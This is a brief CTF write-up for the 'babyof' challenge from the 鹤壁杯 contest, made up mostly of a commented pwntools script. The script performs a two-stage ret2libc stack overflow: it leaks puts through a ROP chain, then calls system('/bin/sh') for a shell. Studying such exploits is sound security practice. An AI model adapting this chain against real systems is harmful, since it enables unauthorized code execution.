鹤壁杯--babyof
这一道 ret2libc 的题目很常规，不再过多介绍，简单记录一下。
from pwn import *
# Target architecture for the pwntools packing helpers (p64/u64) used below.
context.arch = 'amd64'
# Full I/O tracing of the exchange with the process; lower to 'info' once the
# interaction is understood, it is noisy.
context.log_level = 'debug'
context.terminal = ['tmux','sp','-h']
# The challenge binary and the libc build that ships with it. Every
# libc.sym/libc.search lookup below is only meaningful if the target really
# loads this exact libc-2.27.so; a different build gives wrong offsets.
elf = ELF('./babyof')
#libc = ELF('/lib/x86_64-linux-gnu/libc-2.27.so')
libc = ELF('./libc-2.27.so')
# Local process; the remote connection line is kept commented out.
io = process('./babyof')
#io = remote('182.116.62.85','21613')
# ROP gadgets. prdi/prsi are addresses inside the binary and are used
# unrebased in exp(), so the binary is presumably loaded at a fixed base
# (TODO confirm: no PIE). prdx, by contrast, is an OFFSET into libc and is
# rebased as pop_rdx once libc_base is known -- do not mix the two up.
prdi = 0x0000000000400743#: pop rdi
prsi = 0x0000000000400741 #: pop rsi ; pop r15 ; ret
prdx = 0x0000000000001b96 #: pop rdx ; ret
def exp():
    """Two-stage ret2libc against the stack overflow in ./babyof.

    Stage 1 overwrites the saved return address (0x48 bytes of padding reach
    it) with a chain that calls puts(puts@GOT), leaking the runtime address
    of puts. Stage 2 rebases libc from that leak and sends a second chain
    that calls system on a "/bin/sh" string found inside libc.

    Reads the module-level ``io``, ``elf``, ``libc`` and gadget constants;
    returns nothing. The function is tied to the exact send/recv order of
    the target, so the statements must stay in this sequence.
    """
    # io.recvuntil('Do you know how to do buffer overflow?')
    # Stage 1: pop rdi <- puts@GOT ; call puts@PLT ; then return to 0x40066B.
    # 0x40066B is presumably a point in the binary that re-executes the
    # vulnerable read so a second payload can be delivered -- TODO confirm
    # against the disassembly; it is a magic constant with no symbol here.
    payload = b'a'*0x48 + p64(prdi) + p64(elf.got['puts']) + p64(elf.plt['puts']) + p64(0x40066B)
    io.send(payload)
    # Consume output up to the first 0x7f byte (high byte of a typical
    # user-space pointer), take the last 6 bytes as the leaked pointer and
    # zero-extend to 8. This assumes the first 0x7f byte received belongs to
    # the leak and not to unrelated program output.
    leak = u64(io.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
    info(hex(leak))
    # libc base = leaked puts address minus puts' offset in the bundled libc.
    libc_base = leak - libc.sym['puts']
    system = libc_base + libc.sym['system']
    info(hex(system))
    # First occurrence of a NUL-terminated "/bin/sh" inside the libc image.
    binsh = libc_base + next(libc.search(b'/bin/sh\x00'))
    # prdx is a libc-relative gadget offset; rebase it like the symbols.
    pop_rdx = libc_base + prdx
    # io.recvuntil('Do you know how to do buffer overflow?')
    # Stage 2: rdx <- 0 ; rsi <- 0 (prsi also pops r15, hence the two zero
    # qwords) ; rdi <- binsh ; then jump to system. Why rsi/rdx are cleared
    # before system() is not stated in the writeup -- TODO confirm intent.
    payload = b'a'*0x48 +p64(pop_rdx)+p64(0)+p64(prsi)+p64(0)*2 +p64(prdi) + p64(binsh) + p64(system)
    # gdb.attach(io)
    io.send(payload)
# Drive the two stages against the process opened above, then hand control
# of its stdin/stdout to the user (a shell prompt only if stage 2 succeeded).
exp()
io.interactive()